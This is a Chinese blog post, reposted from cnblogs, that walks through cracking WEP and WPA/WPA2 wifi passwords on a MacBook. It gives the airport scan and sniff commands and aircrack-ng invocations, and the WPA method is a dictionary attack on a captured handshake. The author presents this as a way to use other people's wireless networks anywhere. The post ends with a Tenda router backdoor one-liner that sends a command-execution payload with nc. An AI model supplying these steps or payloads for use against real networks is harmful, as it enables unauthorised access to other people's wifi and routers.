博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
利用MacBook Air入侵无线网络
阅读量:4686 次
发布时间:2019-06-09

本文共 1217 字,大约阅读时间需要 4 分钟。

目前无线网络的加密方式主要有WEP,WPA/WPA2。这是最常看到的加密方式,最近由于需要,专门去研究了一下如何入侵无线网络。

1、入侵WEP加密的无线网络

WEP加密方式现在已经很不安全了,因为只要通过一定量的数据包,就可以穷举出密码,无论密码多么复杂,也最多需要几分钟而已。

WEP的秘钥分为5位和13位。

入侵主要流程:

1)先查看附近的wifi信号

1
airport -s

2)选定其中一个wifi信号,看到其所在的频道,开始监听抓包

1
sudo airport en0 sniff 11

en0 代表无线网卡,11代表要监听的无线信号在11频道上,此时笔记本进入了监听阶段,抓到的包保存为/tmp/airportSniffxxxxx.cap

3)此时我们可以一边抓包,一边进行解密

1
aircrack-ng -1 -a 1 -e xx:xx:xx:xx:xx:xx /tmp/airportSniffxxxxx.cap

-e 代表目的MAC地址

-a 1 代表使用WEP破解方式

只要包到达了一定数量,密码很快就出来了。

注:对于13位的WEP,需要等多的数据包,例外,在数据包足够多时,但是又破解不出来的时候,可以尝试下提高 -f 影响因子的大小(默认为2),可以尝试提高到1024等。

2、入侵WPA/WPA2加密的无线网络

WPA/WPA2相对于WEP来说安全了很多,但是也存在着很大的隐患,虽然不会像WEP那样通过数据包直接分析出来了,但是需要获得了一次handshake,就可以用过字典暴力破解的方法获得秘钥。现在网上不管是弱密码还是已有的泄露的密码,都能找到很多,搜集整理出来一份很好地字典就能走到哪里都有无线可以蹭了。

入侵主要流程:

1)先查看附近的wifi信号

1
airport -s

2)选定其中一个wifi信号,看到其所在的频道,开始监听抓包

1
sudo airport en0 sniff 11

en0 代表无线网卡,11代表要监听的无线信号在11频道上,此时笔记本进入了监听阶段,抓到的包保存为/tmp/airportSniffxxxxx.cap

3)此时我们可以一边抓包,一边进行解密

1
aircrack-ng -w password.txt -e xx:xx:xx:xx:xx:xx /tmp/airportSniffxxxxx.cap

-w 后面代表字典文件

只要拥有一个handshake,就可以开始跑字典破解了。handshake是在监听阶段,有用户重新连接到无线上,就是一个handshake。

3、Tenda路由器后门利用

1
echo -ne 
"w302r_mfg\x00x/bin/ls" 
| nc -u -q 5 192.168.0.1 7329

漏洞原理及利用:

转载于:https://www.cnblogs.com/askDing/p/6273363.html

你可能感兴趣的文章
POJ 3279 Fliptile (二进制枚举)
查看>>
memcached 细究(三)
查看>>
future
查看>>
关于main函数传参数的问题
查看>>
getTickCount()函数 VS GetTickCount()函数
查看>>
嵌入式jetty
查看>>
2017~回顾分享
查看>>
let const var的区别与作用
查看>>
计算出线在屏幕内的最长坐标
查看>>
使用svn——项目的目录布局
查看>>
Linux学习之CentOS(二十五)--Linux磁盘管理:LVM逻辑卷基本概念及LVM的工作原理
查看>>
【bzoj4310/hdu5030-跳蚤】后缀数组
查看>>
深度信任网络的快速学习算法(Hinton的论文)
查看>>
RSA System.Security.Cryptography.CryptographicException
查看>>
s的封装和信息隐蔽
查看>>
excelhttp://www.cnblogs.com/caoyuanzhanlang/p/3591904.html
查看>>
ArrayList和LinkedList和Vector源码分析
查看>>
webservice整合spring cxf
查看>>
再次编译这个应用程序应该不会有问题
查看>>
Ubuntu-tomcat7目录
查看>>